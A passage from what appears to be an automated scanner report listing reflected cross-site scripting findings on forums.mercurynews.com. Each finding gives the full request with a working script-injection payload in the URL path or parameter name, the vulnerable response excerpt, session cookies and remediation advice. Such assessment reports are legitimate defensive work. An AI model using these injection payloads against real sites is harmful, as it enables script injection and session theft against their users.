<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title
...[SNIP]...
f (typeof s != 'undefined') {
   s.pageName="";
   s.channel="Forums";
   s.prop1="Home";
   s.prop2=s.prop1 + " / Opinion";
   s.prop3=s.prop2 + " / Forums";
   s.prop4=s.prop3 + " / syndication/jsonXmlToHtml.jse61ea"-alert(1)-"f6fde09b897";
   s.prop9=getCiQueryString("SOURCE");
   s.campaign=getCiQueryString("EADID")+getCiQueryString("CREF");
   s.events="event1";
   s.eVar2=getCiQueryString("SOURCE");
   s.eVar4=s.pageName;
   s.campaign=getCiQu
...[SNIP]...

3.88. http://forums.mercurynews.com/topic/40th-annivesary-celebration-post-your-memorable-moments-at-childrens-musical-theatre-san-jose [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://forums.mercurynews.com
Path:   /topic/40th-annivesary-celebration-post-your-memorable-moments-at-childrens-musical-theatre-san-jose

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ab22e"-alert(1)-"d193185f86e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /topicab22e"-alert(1)-"d193185f86e/40th-annivesary-celebration-post-your-memorable-moments-at-childrens-musical-theatre-san-jose HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 02:07:08 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:07:32 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22276

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title
...[SNIP]...
anguage="JavaScript">
if (typeof s != 'undefined') {
   s.pageName="";
   s.channel="Forums";
   s.prop1="Home";
   s.prop2=s.prop1 + " / Opinion";
   s.prop3=s.prop2 + " / Forums";
   s.prop4=s.prop3 + " / topicab22e"-alert(1)-"d193185f86e/40th-annivesary-celebration-post-your-memorable-moments-at-childrens-musical-theatre-san-jose";
   s.prop9=getCiQueryString("SOURCE");
   s.campaign=getCiQueryString("EADID")+getCiQueryString("CREF");
   s.
...[SNIP]...

3.89. http://forums.mercurynews.com/topic/40th-annivesary-celebration-post-your-memorable-moments-at-childrens-musical-theatre-san-jose [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://forums.mercurynews.com
Path:   /topic/40th-annivesary-celebration-post-your-memorable-moments-at-childrens-musical-theatre-san-jose

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5f6eb"-alert(1)-"db61396b3da was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /topic/40th-annivesary-celebration-post-your-memorable-moments-at-childrens-musical-theatre-san-jose5f6eb"-alert(1)-"db61396b3da HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 02:07:22 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:07:46 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22276

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title
...[SNIP]...
rop1="Home";
   s.prop2=s.prop1 + " / Opinion";
   s.prop3=s.prop2 + " / Forums";
   s.prop4=s.prop3 + " / topic/40th-annivesary-celebration-post-your-memorable-moments-at-childrens-musical-theatre-san-jose5f6eb"-alert(1)-"db61396b3da";
   s.prop9=getCiQueryString("SOURCE");
   s.campaign=getCiQueryString("EADID")+getCiQueryString("CREF");
   s.events="event1";
   s.eVar2=getCiQueryString("SOURCE");
   s.eVar4=s.pageName;
   s.campaign=getCiQu
...[SNIP]...

3.90. http://forums.mercurynews.com/topic/40th-annivesary-celebration-post-your-memorable-moments-at-childrens-musical-theatre-san-jose [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://forums.mercurynews.com
Path:   /topic/40th-annivesary-celebration-post-your-memorable-moments-at-childrens-musical-theatre-san-jose

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d0fec"-alert(1)-"b2737086bf5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /topic/40th-annivesary-celebration-post-your-memorable-moments-at-childrens-musical-theatre-san-jose?d0fec"-alert(1)-"b2737086bf5=1 HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 02:06:50 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:07:14 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22243

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title
...[SNIP]...
op1="Home";
   s.prop2=s.prop1 + " / Opinion";
   s.prop3=s.prop2 + " / Forums";
   s.prop4=s.prop3 + " / topic/40th-annivesary-celebration-post-your-memorable-moments-at-childrens-musical-theatre-san-jose?d0fec"-alert(1)-"b2737086bf5=1";
   s.prop9=getCiQueryString("SOURCE");
   s.campaign=getCiQueryString("EADID")+getCiQueryString("CREF");
   s.events="event1";
   s.eVar2=getCiQueryString("SOURCE");
   s.eVar4=s.pageName;
   s.campaign=getCi
...[SNIP]...

3.91. http://forums.mercurynews.com/topic/645-sri-lanka-and-thailand-9-1-2010 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://forums.mercurynews.com
Path:   /topic/645-sri-lanka-and-thailand-9-1-2010

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e42c8"-alert(1)-"227f159106e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /topice42c8"-alert(1)-"227f159106e/645-sri-lanka-and-thailand-9-1-2010 HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 02:07:18 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:07:42 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22160

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title
...[SNIP]...
anguage="JavaScript">
if (typeof s != 'undefined') {
   s.pageName="";
   s.channel="Forums";
   s.prop1="Home";
   s.prop2=s.prop1 + " / Opinion";
   s.prop3=s.prop2 + " / Forums";
   s.prop4=s.prop3 + " / topice42c8"-alert(1)-"227f159106e/645-sri-lanka-and-thailand-9-1-2010";
   s.prop9=getCiQueryString("SOURCE");
   s.campaign=getCiQueryString("EADID")+getCiQueryString("CREF");
   s.events="event1";
   s.eVar2=getCiQueryString("SOURCE");
   s.e
...[SNIP]...

3.92. http://forums.mercurynews.com/topic/645-sri-lanka-and-thailand-9-1-2010 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://forums.mercurynews.com
Path:   /topic/645-sri-lanka-and-thailand-9-1-2010

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 51c06"-alert(1)-"12bdca9849b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /topic/645-sri-lanka-and-thailand-9-1-201051c06"-alert(1)-"12bdca9849b HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 02:07:28 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:07:52 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22160

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title
...[SNIP]...
= 'undefined') {
   s.pageName="";
   s.channel="Forums";
   s.prop1="Home";
   s.prop2=s.prop1 + " / Opinion";
   s.prop3=s.prop2 + " / Forums";
   s.prop4=s.prop3 + " / topic/645-sri-lanka-and-thailand-9-1-201051c06"-alert(1)-"12bdca9849b";
   s.prop9=getCiQueryString("SOURCE");
   s.campaign=getCiQueryString("EADID")+getCiQueryString("CREF");
   s.events="event1";
   s.eVar2=getCiQueryString("SOURCE");
   s.eVar4=s.pageName;
   s.campaign=getCiQu
...[SNIP]...

3.93. http://forums.mercurynews.com/topic/645-sri-lanka-and-thailand-9-1-2010 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://forums.mercurynews.com
Path:   /topic/645-sri-lanka-and-thailand-9-1-2010

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9b712"-alert(1)-"c150a5b4989 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /topic/645-sri-lanka-and-thailand-9-1-2010?9b712"-alert(1)-"c150a5b4989=1 HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 02:07:06 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:07:30 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 46103

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title
...[SNIP]...
'undefined') {
   s.pageName="";
   s.channel="Forums";
   s.prop1="Home";
   s.prop2=s.prop1 + " / Opinion";
   s.prop3=s.prop2 + " / Forums";
   s.prop4=s.prop3 + " / topic/645-sri-lanka-and-thailand-9-1-2010?9b712"-alert(1)-"c150a5b4989=1";
   s.prop9=getCiQueryString("SOURCE");
   s.campaign=getCiQueryString("EADID")+getCiQueryString("CREF");
   s.events="event1";
   s.eVar2=getCiQueryString("SOURCE");
   s.eVar4=s.pageName;
   s.campaign=getCi
...[SNIP]...

3.94. http://forums.mercurynews.com/topic/about-gold-price-and-inflation [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://forums.mercurynews.com
Path:   /topic/about-gold-price-and-inflation

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b094c"-alert(1)-"6bbb6d77a1d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /topicb094c"-alert(1)-"6bbb6d77a1d/about-gold-price-and-inflation HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 02:07:22 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:07:46 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22150

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title
...[SNIP]...
anguage="JavaScript">
if (typeof s != 'undefined') {
   s.pageName="";
   s.channel="Forums";
   s.prop1="Home";
   s.prop2=s.prop1 + " / Opinion";
   s.prop3=s.prop2 + " / Forums";
   s.prop4=s.prop3 + " / topicb094c"-alert(1)-"6bbb6d77a1d/about-gold-price-and-inflation";
   s.prop9=getCiQueryString("SOURCE");
   s.campaign=getCiQueryString("EADID")+getCiQueryString("CREF");
   s.events="event1";
   s.eVar2=getCiQueryString("SOURCE");
   s.eVar4=
...[SNIP]...

3.95. http://forums.mercurynews.com/topic/about-gold-price-and-inflation [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://forums.mercurynews.com
Path:   /topic/about-gold-price-and-inflation

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cfbe9"-alert(1)-"886bc9b8793 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /topic/about-gold-price-and-inflationcfbe9"-alert(1)-"886bc9b8793 HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 02:07:27 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:07:51 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22150

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title
...[SNIP]...
f s != 'undefined') {
   s.pageName="";
   s.channel="Forums";
   s.prop1="Home";
   s.prop2=s.prop1 + " / Opinion";
   s.prop3=s.prop2 + " / Forums";
   s.prop4=s.prop3 + " / topic/about-gold-price-and-inflationcfbe9"-alert(1)-"886bc9b8793";
   s.prop9=getCiQueryString("SOURCE");
   s.campaign=getCiQueryString("EADID")+getCiQueryString("CREF");
   s.events="event1";
   s.eVar2=getCiQueryString("SOURCE");
   s.eVar4=s.pageName;
   s.campaign=getCiQu
...[SNIP]...

3.96. http://forums.mercurynews.com/topic/about-gold-price-and-inflation [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://forums.mercurynews.com
Path:   /topic/about-gold-price-and-inflation

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8247c"-alert(1)-"6f9bb8c880e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /topic/about-gold-price-and-inflation?8247c"-alert(1)-"6f9bb8c880e=1 HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 02:07:09 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:07:33 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 95450

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title
...[SNIP]...
s != 'undefined') {
   s.pageName="";
   s.channel="Forums";
   s.prop1="Home";
   s.prop2=s.prop1 + " / Opinion";
   s.prop3=s.prop2 + " / Forums";
   s.prop4=s.prop3 + " / topic/about-gold-price-and-inflation?8247c"-alert(1)-"6f9bb8c880e=1";
   s.prop9=getCiQueryString("SOURCE");
   s.campaign=getCiQueryString("EADID")+getCiQueryString("CREF");
   s.events="event1";
   s.eVar2=getCiQueryString("SOURCE");
   s.eVar4=s.pageName;
   s.campaign=getCi
...[SNIP]...

3.97. http://forums.mercurynews.com/topic/al-qaida-is-us-puppet [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://forums.mercurynews.com
Path:   /topic/al-qaida-is-us-puppet

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6ef8c"-alert(1)-"b016d693cff was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /topic6ef8c"-alert(1)-"b016d693cff/al-qaida-is-us-puppet HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 02:07:14 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:07:38 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22132

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title
...[SNIP]...
anguage="JavaScript">
if (typeof s != 'undefined') {
   s.pageName="";
   s.channel="Forums";
   s.prop1="Home";
   s.prop2=s.prop1 + " / Opinion";
   s.prop3=s.prop2 + " / Forums";
   s.prop4=s.prop3 + " / topic6ef8c"-alert(1)-"b016d693cff/al-qaida-is-us-puppet";
   s.prop9=getCiQueryString("SOURCE");
   s.campaign=getCiQueryString("EADID")+getCiQueryString("CREF");
   s.events="event1";
   s.eVar2=getCiQueryString("SOURCE");
   s.eVar4=s.pageNam
...[SNIP]...

3.98. http://forums.mercurynews.com/topic/al-qaida-is-us-puppet [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://forums.mercurynews.com
Path:   /topic/al-qaida-is-us-puppet

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9afde"-alert(1)-"410d6a4b262 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /topic/al-qaida-is-us-puppet9afde"-alert(1)-"410d6a4b262 HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 02:07:27 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:07:51 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22132

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title
...[SNIP]...
if (typeof s != 'undefined') {
   s.pageName="";
   s.channel="Forums";
   s.prop1="Home";
   s.prop2=s.prop1 + " / Opinion";
   s.prop3=s.prop2 + " / Forums";
   s.prop4=s.prop3 + " / topic/al-qaida-is-us-puppet9afde"-alert(1)-"410d6a4b262";
   s.prop9=getCiQueryString("SOURCE");
   s.campaign=getCiQueryString("EADID")+getCiQueryString("CREF");
   s.events="event1";
   s.eVar2=getCiQueryString("SOURCE");
   s.eVar4=s.pageName;
   s.campaign=getCiQu
...[SNIP]...

3.99. http://forums.mercurynews.com/topic/al-qaida-is-us-puppet [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://forums.mercurynews.com
Path:   /topic/al-qaida-is-us-puppet

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 83c90"-alert(1)-"f57460e9cf9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

